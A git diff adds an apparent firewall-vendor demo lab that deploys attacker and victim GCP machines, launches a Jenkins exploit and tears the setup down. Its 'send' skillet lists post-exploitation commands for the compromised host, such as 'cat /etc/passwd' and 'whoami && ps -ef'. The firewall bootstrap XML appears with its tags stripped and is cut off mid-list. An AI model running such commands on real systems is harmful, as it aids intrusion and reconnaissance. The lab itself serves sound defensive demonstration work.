diff --git a/gcp/Jenkins_proj-master/.pan-cnc/destroy/.meta-cnc.yaml b/gcp/Jenkins_proj-master/.pan-cnc/destroy/.meta-cnc.yaml
new file mode 100644
index 00000000..dcd0ad24
--- /dev/null
+++ b/gcp/Jenkins_proj-master/.pan-cnc/destroy/.meta-cnc.yaml
@@ -0,0 +1,41 @@
+name: gcp_jenkins_exp_teardown
+# label used for menu selection
+label: GCP Jenkins Security Framework Step 4 Teardown
+
+description: >
+ This skillet will destroy the GCP Jenkins Environment. Run this step once the demo is complete.
+# type of skillet (panos or panorama or template or terraform)
+type: python3
+
+# more complex skillets may express a dependency on another skillet that should be loaded before this one.
+# For example, a set of skillets may build off of a single 'golden config' that contains shared configuration
+# As this skillet is very simple, there is no need to build on another one.
+extends:
+
+# Labels allow grouping and type specific options and are generally only used in advanced cases
+labels:
+ collection: GCP Jenkins Security Framework
+
+# variables define the things an operator may customize in this skillet. Things like DNS servers, NTP addresses, etc
+# may be customized for each deployment. Each variable will be rendered as a form field in the panhandler application
+variables:
+ - name: username
+ description: FW Username
+ default: admin
+ type_hint: text
+ - name: password
+ description: FW Password
+ default:
+ type_hint: password
+
+# Snippets is an ordered list of configuration xml fragments that will be pushed to the PAN-OS NGFW. The xpath
+# determines where in the configuration hierarchy the xml fragment will be set. 'file' indicates the name of the file
+# to load and parse. Jinja2 style variables will be variable interpolated using the values of the 'variables' defined
+# in the 'variables' section.
+snippets:
+ - name: script
+ file: ../../destroy.py
+# output_type:
+# outputs:
+# - name: app_threat_version
+# capture_pattern: result/content-updates/entry/version
diff --git a/gcp/Jenkins_proj-master/.pan-cnc/launch/.meta-cnc.yaml b/gcp/Jenkins_proj-master/.pan-cnc/launch/.meta-cnc.yaml
new file mode 100644
index 00000000..539c9b30
--- /dev/null
+++ b/gcp/Jenkins_proj-master/.pan-cnc/launch/.meta-cnc.yaml
@@ -0,0 +1,41 @@
+name: gcp_jenkins_launch
+# label used for menu selection
+label: GCP Jenkins Security Framework Step 2 Launch exploit
+
+description: >
+ This Skillet will launch the Jenkins exploit. You can choose to use the native tools or select PANOS enabled
+ Security to run the exploit of Jenkins Web application.
+
+# type of skillet (panos or panorama or template or terraform)
+type: python3
+
+# more complex skillets may express a dependency on another skillet that should be loaded before this one.
+# For example, a set of skillets may build off of a single 'golden config' that contains shared configuration
+# As this skillet is very simple, there is no need to build on another one.
+extends:
+
+# Labels allow grouping and type specific options and are generally only used in advanced cases
+labels:
+ collection: GCP Jenkins Security Framework
+
+# variables define the things an operator may customize in this skillet. Things like DNS servers, NTP addresses, etc
+# may be customized for each deployment. Each variable will be rendered as a form field in the panhandler application
+variables:
+ - name: vector
+ description: Attack Vector
+ default: native
+ type_hint: dropdown
+ dd_list:
+ - key: Native WAF
+ value: native
+ - key: PAN-OS
+ value: panos
+
+
+# Snippets is an ordered list of configuration xml fragments that will be pushed to the PAN-OS NGFW. The xpath
+# determines where in the configuration hierarchy the xml fragment will be set. 'file' indicates the name of the file
+# to load and parse. Jinja2 style variables will be variable interpolated using the values of the 'variables' defined
+# in the 'variables' section.
+snippets:
+ - name: payload
+ file: ../../launch_attack_vector.py
\ No newline at end of file
diff --git a/gcp/Jenkins_proj-master/.pan-cnc/login/.meta-cnc.yaml b/gcp/Jenkins_proj-master/.pan-cnc/login/.meta-cnc.yaml
new file mode 100644
index 00000000..9f46a8bb
--- /dev/null
+++ b/gcp/Jenkins_proj-master/.pan-cnc/login/.meta-cnc.yaml
@@ -0,0 +1,32 @@
+name: GCP_login
+label: GCP Login (Pre-Deployment Step)
+
+description: |
+ This skillet will log into GCP. You will be prompted to follow a link and enter a device-code in your browser.
+# type of skillet (panos or panorama or template or terraform)
+type: template
+
+# more complex skillets may express a dependency on another skillet that should be loaded before this one.
+# For example, a set of skillets may build off of a single 'golden config' that contains shared configuration
+# As this skillet is very simple, there is no need to build on another one.
+extends:
+
+# Labels allow grouping and type specific options and are generally only used in advanced cases
+labels:
+ collection: GCP Jenkins Security Framework
+
+# variables define the things an operator may customize in this skillet. Things like DNS servers, NTP addresses, etc
+# may be customized for each deployment. Each variable will be rendered as a form field in the panhandler application
+variables:
+# - name: api_key
+# description: API Key
+# default: abc123
+# type_hint: text
+
+# Snippets is an ordered list of configuration xml fragments that will be pushed to the PAN-OS NGFW. The xpath
+# determines where in the configuration hierarchy the xml fragment will be set. 'file' indicates the name of the file
+# to load and parse. Jinja2 style variables will be variable interpolated using the values of the 'variables' defined
+# in the 'variables' section.
+snippets:
+ - name: script
+ file: docker_cmd.j2
diff --git a/gcp/Jenkins_proj-master/.pan-cnc/login/docker_cmd.j2 b/gcp/Jenkins_proj-master/.pan-cnc/login/docker_cmd.j2
new file mode 100644
index 00000000..02637f31
--- /dev/null
+++ b/gcp/Jenkins_proj-master/.pan-cnc/login/docker_cmd.j2
@@ -0,0 +1,25 @@
+To authenticate to GCP, please run the following command:
+
+Make sure you have a .config directory in you home directory
+On either OSX or Windows if the .config directory does not exist in your home directory:
+
+command from terminal or powershell in user home directory:
+mkdir .config
+
+
+Mac OSX- From a terminal window:
+docker run -ti --rm -v $HOME/.config:/root/.config google/cloud-sdk gcloud auth application-default login
+
+Windows- from a powershell:
+docker run -ti -p 8888:80 --rm -v /c/Users/%USERNAME%/.config:/root/.config google/cloud-sdk gcloud auth application-default login
+
+This command will display a link that you should copy into your browser. This will then display a verification
+code that you use to authenticate this machine.
+
+
+For more information, see the Google Cloud SDK guide here:
+
+https://cloud.google.com/sdk/gcloud/
+
+And for more information on authenticating, see here:
+https://cloud.google.com/sdk/gcloud/reference/auth/application-default/login
diff --git a/gcp/Jenkins_proj-master/.pan-cnc/send/.meta-cnc.yaml b/gcp/Jenkins_proj-master/.pan-cnc/send/.meta-cnc.yaml
new file mode 100644
index 00000000..5c843d7e
--- /dev/null
+++ b/gcp/Jenkins_proj-master/.pan-cnc/send/.meta-cnc.yaml
@@ -0,0 +1,45 @@
+name: gcp_jenkins_send
+# label used for menu selection
+label: GCP Jenkins Security Framework Step 3 Send Command
+
+description: >
+ This Skillet will allow you to interact and send commands to the exploited Jenkins system.
+# type of skillet (panos or panorama or template or terraform)
+type: python3
+
+# more complex skillets may express a dependency on another skillet that should be loaded before this one.
+# For example, a set of skillets may build off of a single 'golden config' that contains shared configuration
+# As this skillet is very simple, there is no need to build on another one.
+extends:
+
+# Labels allow grouping and type specific options and are generally only used in advanced cases
+labels:
+ collection: GCP Jenkins Security Framework
+
+# variables define the things an operator may customize in this skillet. Things like DNS servers, NTP addresses, etc
+# may be customized for each deployment. Each variable will be rendered as a form field in the panhandler application
+variables:
+ - name: cli
+ description: Command to Send
+ default: cat /etc/passwd
+ type_hint: dropdown
+ dd_list:
+ - key: "whoami & ps -ef--- Show who you are logged in as and running processes"
+ value: "whoami && ps -ef"
+ - key: "cat /etc/passwd--- show the contents of the passwd file"
+ value: "cat /etc/passwd"
+ - key: "netstat -a---- showing active tcp sessions"
+ value: "netstat -a"
+ - key: "netstat -tn 2>/dev/null |grep :443--- Show active tcp session on port 443"
+ value: "netstat -tn 2>/dev/null |grep :443"
+ - name: manual_cli
+ description: Manual Command to Send
+ default: ''
+ type_hint: text
+# Snippets is an ordered list of configuration xml fragments that will be pushed to the PAN-OS NGFW. The xpath
+# determines where in the configuration hierarchy the xml fragment will be set. 'file' indicates the name of the file
+# to load and parse. Jinja2 style variables will be variable interpolated using the values of the 'variables' defined
+# in the 'variables' section.
+snippets:
+ - name: payload
+ file: ../../send_command.py
diff --git a/gcp/Jenkins_proj-master/README.md b/gcp/Jenkins_proj-master/README.md
new file mode 100644
index 00000000..d76662b1
--- /dev/null
+++ b/gcp/Jenkins_proj-master/README.md
@@ -0,0 +1,2 @@
+Jenkins_proj
+Jenkins Project
diff --git a/gcp/Jenkins_proj-master/WebInDeploy/attackers.tf b/gcp/Jenkins_proj-master/WebInDeploy/attackers.tf
new file mode 100644
index 00000000..d5efe764
--- /dev/null
+++ b/gcp/Jenkins_proj-master/WebInDeploy/attackers.tf
@@ -0,0 +1,42 @@
+resource "google_compute_instance" "attacker" {
+ name = "attacker"
+ project = "${google_project.attacker_project.id}"
+ zone = "${var.GCP_Zone}"
+ machine_type = "n1-standard-1"
+ allow_stopping_for_update = true
+ timeouts = {
+ create = "15m"
+ delete = "60m"
+ }
+ depends_on = [
+ "google_storage_bucket_object.config_file_attacker",
+ "google_project_service.attacker_project"
+ ]
+ metadata {
+ startup-script-url = "gs://${google_storage_bucket.attacker_bucket.name}/initialize_attacker.sh"
+ serial-port-enable = true
+ }
+
+ service_account {
+ scopes = [
+ "https://www.googleapis.com/auth/cloud.useraccounts.readonly",
+ "https://www.googleapis.com/auth/devstorage.read_only",
+ "https://www.googleapis.com/auth/logging.write",
+ "https://www.googleapis.com/auth/monitoring.write",
+ "https://www.googleapis.com/auth/compute.readonly",
+ ]
+ }
+
+ boot_disk {
+ initialize_params {
+ image = "ubuntu-os-cloud/ubuntu-1604-lts"
+ }
+ }
+
+ network_interface {
+ subnetwork = "${google_compute_subnetwork.attacker_subnet.self_link}"
+ network_ip = "${var.Attacker_IP}"
+ access_config = {}
+ }
+ depends_on = ["google_storage_bucket_object.config_file_attacker"]
+}
diff --git a/gcp/Jenkins_proj-master/WebInDeploy/bootstrap.tf b/gcp/Jenkins_proj-master/WebInDeploy/bootstrap.tf
new file mode 100644
index 00000000..5221c2dc
--- /dev/null
+++ b/gcp/Jenkins_proj-master/WebInDeploy/bootstrap.tf
@@ -0,0 +1,47 @@
+resource "google_storage_bucket" "bootstrap_bucket" {
+ name = "${var.Victim_Project_Name}-${random_id.project_number.hex}"
+ storage_class = "REGIONAL"
+ location = "${var.GCP_Region}"
+ project = "${google_project.victim_project.id}"
+}
+resource "google_storage_bucket" "attacker_bucket" {
+ name = "${var.Attacker_Project_Name}-${random_id.project_number.hex}"
+ storage_class = "REGIONAL"
+ location = "${var.GCP_Region}"
+ project = "${google_project.attacker_project.id}"
+}
+resource "google_storage_bucket_object" "config_file_webserver" {
+ name = "initialize_webserver.sh"
+ source = "scripts/initialize_webserver.sh"
+ bucket = "${google_storage_bucket.bootstrap_bucket.name}"
+}
+resource "google_storage_bucket_object" "config_file_attacker" {
+ name = "initialize_attacker.sh"
+ source = "scripts/initialize_attacker.sh"
+ bucket = "${google_storage_bucket.attacker_bucket.name}"
+}
+resource "google_storage_bucket_object" "bootstrap" {
+ name = "config/bootstrap.xml"
+ source = "bootstrap/bootstrap.xml"
+ bucket = "${google_storage_bucket.bootstrap_bucket.name}"
+}
+resource "google_storage_bucket_object" "init_cfg" {
+ name = "config/init-cfg.txt"
+ source = "bootstrap/init-cfg.txt"
+ bucket = "${google_storage_bucket.bootstrap_bucket.name}"
+}
+resource "google_storage_bucket_object" "content" {
+ name = "content/null.txt"
+ source = "bootstrap/null.txt"
+ bucket = "${google_storage_bucket.bootstrap_bucket.name}"
+}
+resource "google_storage_bucket_object" "software" {
+ name = "software/null.txt"
+ source = "bootstrap/null.txt"
+ bucket = "${google_storage_bucket.bootstrap_bucket.name}"
+}
+resource "google_storage_bucket_object" "license" {
+ name = "license/null.txt"
+ source = "bootstrap/null.txt"
+ bucket = "${google_storage_bucket.bootstrap_bucket.name}"
+}
\ No newline at end of file
diff --git a/gcp/Jenkins_proj-master/WebInDeploy/bootstrap/bootstrap.xml b/gcp/Jenkins_proj-master/WebInDeploy/bootstrap/bootstrap.xml
new file mode 100644
index 00000000..83b66601
--- /dev/null
+++ b/gcp/Jenkins_proj-master/WebInDeploy/bootstrap/bootstrap.xml
@@ -0,0 +1,2656 @@
+
+
+
+
+
+ $1$fhfqjgjl$UKU4H9KWTwmKrxropu9BK.
+
+
+ yes
+
+
+ c3NoLXJzYSBBQUFBQjNOemFDMXljMkVBQUFBREFRQUJBQUFCQVFDR3ZDNHZmYk1JbXVSSTlnNGx5SkJRQ0NNSUFjZk0wemVMM2VFM0REdlRkRmYrYzZLOHVJUlRwUk01MHo0TVEwTXd1TEo0Rk1iclQ5ZVRsaEZaZitYcjVBZzJ2R2xIRE9zcEEwSWtmbzZXaTBwYnQ1d1hYV1YwOCs1Tk9GRkpXNm13YThvWUV3RUtHZWlDTEJnRWMyRTgzaXo3alNiNkRST3hXakxDOWVkZmR0ZmNTSzhlNW1kbmRZUkVMK3ZoaSt1QUZac0RpTEhMWGNpeFlaU0xML0xvcmIzK2hnOVdsejQwR0IwMmVsRk1Oc3hJSFdzVUQxMDFVelJzWWFxYWVVWjRuNDlxOVhtc1ZxazVkbHRhcTdtYitWNTZqaVBvVG1wZGNjNjZycGtqWFNjK2NFWGMzaitNbUFRd1F5RkFjbDI2dzlGb3pvUmo4MmY0REx3SncwaEIgamZyYW5rbGluMg==
+
+
+
+
+
+
+
+
+
+
+
+
+ yes
+ 5
+
+
+ yes
+ 5
+
+
+ yes
+ 5
+
+
+ yes
+ 10
+
+
+ yes
+ 5
+
+
+
+ yes
+
+
+
+ 10
+ 10
+
+ 100
+ 50
+
+
+
+ 10
+ 10
+
+ 100
+ 50
+
+
+
+
+
+ 100
+ yes
+
+
+
+
+
+
+
+ Panorama
+ 1.2.3.4
+ test@yourdomain.com
+ test@yourdomain.com
+
+
+
+
+
+
+
+
+ UDP
+ 514
+ BSD
+ 1.2.3.4
+ LOG_USER
+
+
+
+
+
+
+
+
+ Sample_Email_Profile
+
+ (severity eq critical)
+ Email Critical System Logs
+
+
+ All Logs
+ no
+
+ Sample_Syslog_Profile
+
+
+
+
+
+
+
+ All Logs
+ no
+
+ Sample_Syslog_Profile
+
+
+
+
+
+
+
+ All Logs
+ no
+
+ Sample_Syslog_Profile
+
+
+
+
+
+
+
+ All Logs
+ no
+
+ Sample_Syslog_Profile
+
+
+
+
+
+
+
+
+ traffic
+ All Logs
+ no
+
+ Sample_Syslog_Profile
+
+
+
+ threat
+ All Logs
+ no
+
+ Sample_Syslog_Profile
+
+
+
+
+ Sample_Email_Profile
+
+ Email Malicious Wildfire Verdicts
+ wildfire
+ (verdict eq malicious)
+ no
+
+
+
+ Sample_Email_Profile
+
+ Email Phishing Wildfire Verdicts
+ wildfire
+ (verdict eq phishing)
+ no
+
+
+ wildfire
+ All Logs
+ no
+
+ Sample_Syslog_Profile
+
+
+
+ url
+ All Logs
+ no
+
+ Sample_Syslog_Profile
+
+
+
+ data
+ All Logs
+ no
+
+ Sample_Syslog_Profile
+
+
+
+ gtp
+ All Logs
+ no
+
+ Sample_Syslog_Profile
+
+
+
+ tunnel
+ All Logs
+ no
+
+ Sample_Syslog_Profile
+
+
+
+ auth
+ All Logs
+ no
+
+ Sample_Syslog_Profile
+
+
+
+
+
+
+
+
+ last-7-calendar-days
+ 500
+ 50
+
+ daily
+ (app neq smtp) and (category neq benign)
+ Files uploaded or downloaded that were later found to be malicious. This is a summary. Act on real-time email.
+
+
+ repeatcnt
+
+ filedigest
+ container-of-app
+ app
+ category
+ filetype
+ rule
+
+
+ repeatcnt
+
+
+
+
+
+ last-30-calendar-days
+ 500
+ 10
+
Wildfire verdicts SMTP
+ daily
+ (app eq smtp) and (category neq benign)
+ Links sent from emails found to be malicious.
+
+
+ repeatcnt
+
+ filedigest
+ container-of-app
+ app
+ category
+ filetype
+ rule
+ subject
+ sender
+ recipient
+ misc
+
+
+
+
+
+ last-30-calendar-days
+ 500
+ 50
+
Clients sinkholed
+ (rule eq 'DNS Sinkhole Block')
+ daily
+
+
+ repeatcnt
+ from
+
+ src
+ srcuser
+
+
+ repeatcnt
+
+
+
+
+
+
+
+
+
+ Clients sinkholed
+
+
+ Wildfire malicious verdicts
+
+
+ Wildfire verdicts SMTP
+
+
+ Hosts visit malicious sites
+
+
+ Host-visit malicious sites plus
+
+
+ Hosts visit questionable sites
+
+
+ Host-visit quest sites plus
+
+
+ yes
+
+
+ Possible Compromise
+
+
+
+
+
+
+ Possible Compromise
+
+
+
+ Sample_Email_Profile
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+ 3
+ 5
+ wait-recover
+
+
+
+
+
+
+
+ 10000
+ 10000
+ 40000
+
+ no
+
+
+
+ 10000
+ 10000
+ 40000
+
+ no
+
+
+
+ 10000
+ 10000
+ 40000
+
+ no
+
+
+
+ 10000
+ 10000
+ 40000
+
+ no
+
+
+
+ 10000
+ 10000
+ 40000
+
+ no
+
+
+
+
+
+
+
+ 2
+ 100
+
+
+
+
+
+ 10
+ 100
+
+
+
+
+
+ 2
+ 100
+
+
+ yes
+ yes
+ yes
+ no
+ global
+
+
+
+
+
+
+
+
+
+ aes-128-cbc
+ 3des
+
+
+ sha1
+
+
+ group2
+
+
+ 8
+
+
+
+
+ aes-128-cbc
+
+
+ sha256
+
+
+ group19
+
+
+ 8
+
+
+
+
+ aes-256-cbc
+
+
+ sha384
+
+
+ group20
+
+
+ 8
+
+
+
+
+
+
+
+ aes-128-cbc
+ 3des
+
+
+ sha1
+
+
+ group2
+
+ 1
+
+
+
+
+
+ aes-128-gcm
+
+
+ none
+
+
+ group19
+
+ 1
+
+
+
+
+
+ aes-256-gcm
+
+
+ none
+
+
+ group20
+
+ 1
+
+
+
+
+
+
+ aes-128-cbc
+
+
+ sha1
+
+
+
+
+
+
+
+
+
+
+ real-time
+
+
+ high
+
+
+ high
+
+
+ medium
+
+
+ medium
+
+
+ low
+
+
+ low
+
+
+ low
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+ WebFW1
+ UTC
+ updates.paloaltonetworks.com
+ yes
+
+
+ 8.8.8.8
+ 10.0.0.2
+
+
+ Gold 1.0 - PANOS 8.0
+
+ yes
+ yes
+
+
+
+
+
+
+
+
+
+
+ yes
+ no
+ no
+ no
+
+
+
+
+
+
+ 00:00
+ download-and-install
+
+ 48
+
+
+
+ yes
+ yes
+ yes
+ yes
+ yes
+ yes
+ yes
+ yes
+
+
+
+
+ 3
+ download-and-install
+
+
+
+
+
+
+
+ yes
+
+
+ FQDN
+
+
+
+ yes
+ no
+ no
+ no
+
+
+ c3NoLXJzYSBBQUFBQjNOemFDMXljMkVBQUFBREFRQUJBQUFCQVFDR3ZDNHZmYk1JbXVSSTlnNGx5SkJRQ0NNSUFjZk0wemVMM2VFM0REdlRkRmYrYzZLOHVJUlRwUk01MHo0TVEwTXd1TEo0Rk1iclQ5ZVRsaEZaZitYcjVBZzJ2R2xIRE9zcEEwSWtmbzZXaTBwYnQ1d1hYV1YwOCs1Tk9GRkpXNm13YThvWUV3RUtHZWlDTEJnRWMyRTgzaXo3alNiNkRST3hXakxDOWVkZmR0ZmNTSzhlNW1kbmRZUkVMK3ZoaSt1QUZac0RpTEhMWGNpeFlaU0xML0xvcmIzK2hnOVdsejQwR0IwMmVsRk1Oc3hJSFdzVUQxMDFVelJzWWFxYWVVWjRuNDlxOVhtc1ZxazVkbHRhcTdtYitWNTZqaVBvVG1wZGNjNjZycGtqWFNjK2NFWGMzaitNbUFRd1F5RkFjbDI2dzlGb3pvUmo4MmY0REx3SncwaEIgamZyYW5rbGluMg==
+ 8.8.8.8
+ 8.8.4.4
+
+
+
+ yes
+ yes
+
+
+
+
+ 10
+
+
+ 30
+
+
+ 1000
+
+
+ 2000
+
+
+ 5
+
+
+ 5
+
+
+ 1
+
+
+ 10
+
+
+ 2
+
+
+ yes
+ yes
+
+
+ yes
+
+
+ no
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+ ELB-HealthChecker/2.0
+ http-req-headers
+
+
+
+
+
+
+ session
+ no
+
+
+ infrastructure
+ networking
+ browser-based
+ 1
+
+
+
+
+ tcp/80
+
+
+
+
+
+
+
+
+
+
+
+
+ GET
+
+
+ GoogleHC/
+ http-req-headers
+
+
+
+
+
+
+ session
+ no
+
+
+ ip-protocol
+ networking
+ client-server
+ 1
+
+
+
+
+
+
+
+
+
+
+
+ allow
+ no
+ yes
+
+
+ Inbound
+
+
+ default
+
+
+ deny
+ no
+ yes
+ default
+
+
+
+
+
+
+
+
+
+
+ financial-services
+ government
+ health-and-medicine
+ Custom-No-Decrypt
+
+
+ any
+
+
+
+
+
+ any
+
+
+ any
+
+
+
+ any
+
+
+ any
+
+ Recommended_Decryption_Profile
+ no-decrypt
+ yes
+ This rule does not do Decryption. This rule is validating SSL Protocol Communications.
+
+
+
+ any
+
+
+ any
+
+
+
+
+
+ any
+
+
+ any
+
+
+
+ any
+
+
+ any
+
+ Recommended_Decryption_Profile
+ no-decrypt
+ This rule does not do Decryption. This rule is validating SSL Protocol Communications.
+
+
+
+
+
+
+
+
+
+ Outbound to the Internet
+
+
+ Inbound from the Internet
+
+
+ Internal to Internal
+
+
+
+
+ 2600:5200::1
+
+
+ 10.0.1.10
+
+
+
+
+
+
+
+
+
+ http://www.team-cymru.org/Services/Bogons/fullbogons-ipv4.txt
+ IPv4 addresses that should not be routed across the Internet. Either reserved IP address space or unassigned and may be used for malicious purposes. More information: http://www.team-cymru.com/bogon-reference.html
+
+
+
+
+
+
+
+
+
+ http://www.team-cymru.org/Services/Bogons/fullbogons-ipv6.txt
+ IPv6 addresses that should not be routed across the Internet. Either reserved IP address space or unassigned and may be used for malicious purposes. More information: http://www.team-cymru.com/bogon-reference.html
+
+
+
+
+
+
+
+
+
+
+
+
+
+ yes
+ yes
+ yes
+ yes
+ yes
+ yes
+
+
+ yes
+ yes
+
+
+ no
+ no
+
+
+ yes
+ yes
+
+
+ tls1-2
+ no
+ no
+ no
+ no
+
+
+
+
+
+
+
+
+ any
+
+
+ any
+
+ both
+ alert
+
+
+
+ any
+
+
+ 7z
+ bat
+ chm
+ class
+ cpl
+ dll
+ hlp
+ hta
+ jar
+ ocx
+ pif
+ scr
+ torrent
+ vbe
+ wsf
+
+ both
+ block
+
+
+
+
+
+
+
+ any
+
+
+ any
+
+ both
+ alert
+
+
+
+ any
+
+
+ 7z
+ bat
+ chm
+ class
+ cpl
+ dll
+ hlp
+ hta
+ jar
+ ocx
+ pif
+ scr
+ torrent
+ vbe
+ wsf
+
+ both
+ block
+
+
+
+
+
+
+
+ any
+
+
+ any
+
+ both
+ alert
+
+
+
+ any
+
+
+ 7z
+ bat
+ chm
+ class
+ cpl
+ hlp
+ hta
+ jar
+ ocx
+ pif
+ scr
+ torrent
+ vbe
+ wsf
+
+ both
+ block
+
+
+
+
+
+
+
+ any
+
+
+ any
+
+ both
+ alert
+
+
+
+
+
+
+
+ any
+
+
+ any
+
+ both
+ alert
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+ 72.5.65.111
+ 2600:5200::1
+
+ single-packet
+
+
+
+
+
+
+
+ high
+ critical
+ medium
+
+ any
+ any
+ single-packet
+
+
+
+
+
+
+ low
+ informational
+
+ any
+ any
+ disable
+
+
+
+
+
+
+
+
+
+
+
+
+
+ 72.5.65.111
+ 2600:5200::1
+
+ single-packet
+
+
+
+
+
+
+
+ high
+ critical
+ medium
+
+ any
+ any
+ single-packet
+
+
+
+
+
+
+ low
+ informational
+
+ any
+ any
+ disable
+
+
+
+
+
+
+
+
+
+
+
+
+
+ 72.5.65.111
+ 2600:5200::1
+
+ single-packet
+
+
+
+
+
+
+
+ high
+ critical
+
+ any
+ any
+ single-packet
+
+
+
+
+
+
+ low
+ informational
+ medium
+
+ any
+ any
+ disable
+
+
+
+
+
+
+
+
+
+
+
+
+
+ 2600:5200::1
+
+ disable
+
+
+
+
+
+
+
+ any
+
+ any
+ any
+ disable
+
+
+
+
+
+
+
+
+
+
+
+
+
+ 72.5.65.111
+ 2600:5200::1
+
+ single-packet
+
+
+
+
+
+
+
+
+
+
+
+ extended-capture
+
+ pan-sinkhole-default-ip
+ ::1
+
+
+
+
+
+
+
+
+ any
+
+ any
+ any
+ single-packet
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+ high
+
+ abortion
+ abused-drugs
+ adult
+ alcohol-and-tobacco
+ auctions
+ business-and-economy
+ command-and-control
+ computer-and-internet-info
+ content-delivery-networks
+ copyright-infringement
+ dating
+ dynamic-dns
+ educational-institutions
+ entertainment-and-arts
+ extremism
+ financial-services
+ gambling
+ games
+ government
+ hacking
+ health-and-medicine
+ home-and-garden
+ hunting-and-fishing
+ insufficient-content
+ internet-communications-and-telephony
+ internet-portals
+ job-search
+ legal
+ malware
+ military
+ motor-vehicles
+ music
+ news
+ not-resolved
+ nudity
+ online-storage-and-backup
+ parked
+ peer-to-peer
+ personal-sites-and-blogs
+ philosophy-and-political-advocacy
+ phishing
+ private-ip-addresses
+ proxy-avoidance-and-anonymizers
+ questionable
+ real-estate
+ recreation-and-hobbies
+ reference-and-research
+ religion
+ search-engines
+ sex-education
+ shareware-and-freeware
+ shopping
+ social-networking
+ society
+ sports
+ stock-advice-and-tools
+ streaming-media
+ swimsuits-and-intimate-apparel
+ training-and-tools
+ translation
+ travel
+ unknown
+ weapons
+ web-advertisements
+ web-based-email
+ web-hosting
+ Black-List
+ White-List
+
+
+ yes
+ yes
+ yes
+ block
+
+ abortion
+ abused-drugs
+ adult
+ alcohol-and-tobacco
+ auctions
+ business-and-economy
+ computer-and-internet-info
+ content-delivery-networks
+ copyright-infringement
+ dating
+ dynamic-dns
+ educational-institutions
+ entertainment-and-arts
+ extremism
+ financial-services
+ gambling
+ games
+ government
+ health-and-medicine
+ home-and-garden
+ hunting-and-fishing
+ insufficient-content
+ internet-communications-and-telephony
+ internet-portals
+ job-search
+ legal
+ military
+ motor-vehicles
+ music
+ news
+ not-resolved
+ nudity
+ online-storage-and-backup
+ parked
+ peer-to-peer
+ personal-sites-and-blogs
+ philosophy-and-political-advocacy
+ private-ip-addresses
+ proxy-avoidance-and-anonymizers
+ questionable
+ real-estate
+ recreation-and-hobbies
+ reference-and-research
+ religion
+ search-engines
+ sex-education
+ shareware-and-freeware
+ shopping
+ social-networking
+ society
+ sports
+ stock-advice-and-tools
+ streaming-media
+ swimsuits-and-intimate-apparel
+ training-and-tools
+ translation
+ travel
+ unknown
+ weapons
+ web-advertisements
+ web-based-email
+ web-hosting
+ White-List
+
+
+ command-and-control
+ hacking
+ malware
+ phishing
+ Black-List
+
+
+
+
+
+
+
+ medium
+
+ abortion
+ abused-drugs
+ adult
+ alcohol-and-tobacco
+ auctions
+ business-and-economy
+ computer-and-internet-info
+ content-delivery-networks
+ copyright-infringement
+ dating
+ dynamic-dns
+ educational-institutions
+ entertainment-and-arts
+ extremism
+ financial-services
+ gambling
+ games
+ government
+ hacking
+ health-and-medicine
+ home-and-garden
+ hunting-and-fishing
+ insufficient-content
+ internet-communications-and-telephony
+ internet-portals
+ job-search
+ legal
+ malware
+ military
+ motor-vehicles
+ music
+ news
+ not-resolved
+ nudity
+ online-storage-and-backup
+ parked
+ peer-to-peer
+ personal-sites-and-blogs
+ philosophy-and-political-advocacy
+ phishing
+ private-ip-addresses
+ proxy-avoidance-and-anonymizers
+ questionable
+ real-estate
+ recreation-and-hobbies
+ reference-and-research
+ religion
+ search-engines
+ sex-education
+ shareware-and-freeware
+ shopping
+ social-networking
+ society
+ sports
+ stock-advice-and-tools
+ streaming-media
+ swimsuits-and-intimate-apparel
+ training-and-tools
+ translation
+ travel
+ unknown
+ weapons
+ web-advertisements
+ web-based-email
+ web-hosting
+
+
+ block
+
+ abortion
+ abused-drugs
+ adult
+ alcohol-and-tobacco
+ auctions
+ business-and-economy
+ computer-and-internet-info
+ content-delivery-networks
+ copyright-infringement
+ dating
+ dynamic-dns
+ educational-institutions
+ entertainment-and-arts
+ extremism
+ financial-services
+ gambling
+ games
+ government
+ hacking
+ health-and-medicine
+ home-and-garden
+ hunting-and-fishing
+ insufficient-content
+ internet-communications-and-telephony
+ internet-portals
+ job-search
+ legal
+ malware
+ military
+ motor-vehicles
+ music
+ news
+ not-resolved
+ nudity
+ online-storage-and-backup
+ parked
+ peer-to-peer
+ personal-sites-and-blogs
+ philosophy-and-political-advocacy
+ phishing
+ private-ip-addresses
+ proxy-avoidance-and-anonymizers
+ questionable
+ real-estate
+ recreation-and-hobbies
+ reference-and-research
+ religion
+ search-engines
+ sex-education
+ shareware-and-freeware
+ shopping
+ social-networking
+ society
+ sports
+ stock-advice-and-tools
+ streaming-media
+ swimsuits-and-intimate-apparel
+ training-and-tools
+ translation
+ travel
+ unknown
+ weapons
+ web-advertisements
+ web-based-email
+ web-hosting
+
+
+
+
+
+
+
+ high
+
+ abortion
+ abused-drugs
+ adult
+ alcohol-and-tobacco
+ auctions
+ business-and-economy
+ command-and-control
+ computer-and-internet-info
+ content-delivery-networks
+ copyright-infringement
+ dating
+ dynamic-dns
+ educational-institutions
+ entertainment-and-arts
+ extremism
+ financial-services
+ gambling
+ games
+ government
+ hacking
+ health-and-medicine
+ home-and-garden
+ hunting-and-fishing
+ insufficient-content
+ internet-communications-and-telephony
+ internet-portals
+ job-search
+ legal
+ malware
+ military
+ motor-vehicles
+ music
+ news
+ not-resolved
+ nudity
+ online-storage-and-backup
+ parked
+ peer-to-peer
+ personal-sites-and-blogs
+ philosophy-and-political-advocacy
+ phishing
+ private-ip-addresses
+ proxy-avoidance-and-anonymizers
+ questionable
+ real-estate
+ recreation-and-hobbies
+ reference-and-research
+ religion
+ search-engines
+ sex-education
+ shareware-and-freeware
+ shopping
+ social-networking
+ society
+ sports
+ stock-advice-and-tools
+ streaming-media
+ swimsuits-and-intimate-apparel
+ training-and-tools
+ translation
+ travel
+ unknown
+ weapons
+ web-advertisements
+ web-based-email
+ web-hosting
+ Black-List
+
+
+ yes
+ yes
+ yes
+ block
+
+ abortion
+ abused-drugs
+ adult
+ alcohol-and-tobacco
+ auctions
+ business-and-economy
+ computer-and-internet-info
+ content-delivery-networks
+ copyright-infringement
+ dating
+ dynamic-dns
+ educational-institutions
+ entertainment-and-arts
+ extremism
+ financial-services
+ gambling
+ games
+ government
+ health-and-medicine
+ home-and-garden
+ hunting-and-fishing
+ insufficient-content
